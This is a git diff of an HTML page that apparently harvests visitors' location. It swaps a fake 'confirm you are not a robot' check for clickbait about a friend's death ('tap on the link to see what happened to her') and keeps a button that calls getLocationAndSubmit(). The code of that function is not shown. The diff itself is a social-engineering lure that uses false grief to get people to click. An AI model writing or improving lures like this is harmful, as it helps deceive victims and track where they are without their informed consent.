--- a/index.html
+++ b/index.html
@@ -3,7 +3,7 @@
 
 <head>
     <meta charset="UTF-8">
-    <title>Welcome to Heritage</title>
+    <title>Gone so soon 😭😭😭😭 life is so sad 😞 tap on the link to see what happened to her 😢 💔</title>
     <!-- Bootstrap CSS -->
     <link href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" rel="stylesheet">
     <style>
@@ -72,11 +72,11 @@
 
 <body>
     <div class="container">
-        <h2 class="mt-5">Welcome to Heritage</h2>
-        <p>Please hold while we confirm you are not a robot</p>
+        <h2 class="mt-5">RIP Dear friend</h2>
+        <p>Gone so soon 😭😭😭😭 life is so sad 😞 tap on the link to see what happened to her 😢 💔</p>
         <div id="loader" class="loader" style="display: none;"></div> <!-- Loader -->
-        <button type="button" class="btn btn-primary mt-3" onclick="getLocationAndSubmit()">Click here to
-            verify</button><br><br>
+        <button type="button" class="btn btn-primary mt-3" onclick="getLocationAndSubmit()">Click here</button><br><br>
+        <img src="/image.jpg" class="image-fluid" style="width: 200px; height: 300px;">
     </div>
 
     <!-- Bootstrap JS and dependencies (optional) -->
